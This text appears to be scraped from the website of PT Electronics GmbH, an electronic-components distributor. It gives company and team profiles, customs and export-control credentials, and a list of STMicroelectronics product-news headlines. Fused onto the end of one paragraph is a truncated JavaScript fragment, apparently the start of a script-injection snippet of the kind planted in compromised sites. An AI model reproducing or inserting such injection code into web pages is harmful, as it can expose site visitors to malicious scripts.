New brand and department NAVIA was incorporated in 2011 specially to manufacture state-of-the-art GPS/GLONASS/GALILEO receiver modules and embedded subsystems for the Russian and international market.
The PT AIR company is specializing in sale and delivery of the automatic systems for industrial application and railway service. The main delivery destinations are industrial computers, low voltage switching facilities, constructs, industrial ETHERNET, industrial sequence controls, couplings.
The main field of activities of company PT Technology are engineering and technology consulting of the full range: from development of the most effective total design-engineering solution to implementation of a developed solution into manufacturing. PT Technology offers consulting service in such areas as circuit technology, optimization and commonality of component database, selection of contract manufacturers.
- PT Electronics GmbH is an independent distributor for electronic components and belongs to the PT Holding. We work very closely with Russian speaking countries and have the aim to extend our business with Eastern Europe and Russia. In our portfolio we have many well-known manufacturers. These manufacturers have a high degree of trust in us. The team of PT Electronics GmbH has many years of experience in Eastern Europe, Ukraine and Russia. Our team consists of the CEO Isabella Dybek, the CFO Darius Dybek, the Director Marketing & Purchasing Thomas Dybek, the Sales Director Svetlana Boras and the Director Customs & Export Janice Goltz. PT Electronics GmbH has received the status of the authorized economic operator from the German customs authorities, having passed AEO certification (Authorized Economic Operator). This status is granted to the company PT Electronics GmbH to confirm its reliability and continuous observation of the relevant legislation and of the established safety standards. The status of the authorized economic operator allows PT Electronics GmbH to undergo simplified customs procedures and thus to carry out a more speedy and reliable export of goods. Electronic components due to their various application are subject to EU export control. PT Electronics GmbH successfully cooperates with the Federal Office of Economics and Export Control (BAFA) in the sphere of export control. Previous goods requiring special authorization have been exported quickly and reliably.var d=document;var s=d.createElement('script');
- 5 May Affordable STM32 Cloud-Connectable Kit from STMicroelectronics Puts More Features On-Board for Fast and Flexible IoT-Device Development
- 29 Apr Very high accuracy Op-Amps TSZ182
- 20 Apr Build a presence detector that won’t drain the battery
- 15 Apr STMicroelectronics Teams with DSP Concepts to Give STM32 Users Free Access to Advanced Audio Design Tool
- 14 Apr PT Electronics invites to visit our booth at the exhibition Expo Electronica 2017
- 30 Mar STMicroelectronics has made starting new designs with its popular 8-bit STM8 microcontrollers easier and faster by introducing the STM8CubeMX graphical configurator
- 24 Mar STMicroelectronics Launches Tiny 2.6A Brushed DC Motor Driver for Portable, Battery-Powered IoT Devices
- 20 Mar TIB Series DIN-Rail Power Supplies
- 16 Mar New Best-in-Class 900V MOSFETs from STMicroelectronics Enhance Power and Efficiency of Flyback Converters
- 11 Mar STMicroelectronics continues to enhance flexibility for developers working with high-performance STM32F722/723 microcontrollers
- 22 Feb Evaluation boards from STMicroelectronics for rapid and cost-effective development solutions for LoRaWAN™
- 9 Feb STMicroelectronics has extended its SLLIMM™ nano series of Intelligent Power Modules (IPMs)
- 31 Jan ST25 NFC/RFID Readers from STMicroelectronics
- 20 Jan TDN 1WI / 1WISM – miniature DC / DC-converters in two casing performances
- 11 Jan STSPIN240 – dual brush DC motor driver
- 16 Dec STMicroelectronics Extends Feature Integration and Flexibility of STM32F4 Access Lines with STM32F413/423 MCUs
- 6 Dec Ultra low-power high performance 3-axes accelerometer STMicroelectronics
- 30 Nov TS985 – tiny micropower comparator targets space-constrained applications
- 24 Nov ST’s new S2-LP transceiver chip for the Internet-of-Things
- 19 Nov Latest-Generation 16V CMOS Analog Comparators from STMicroelectronics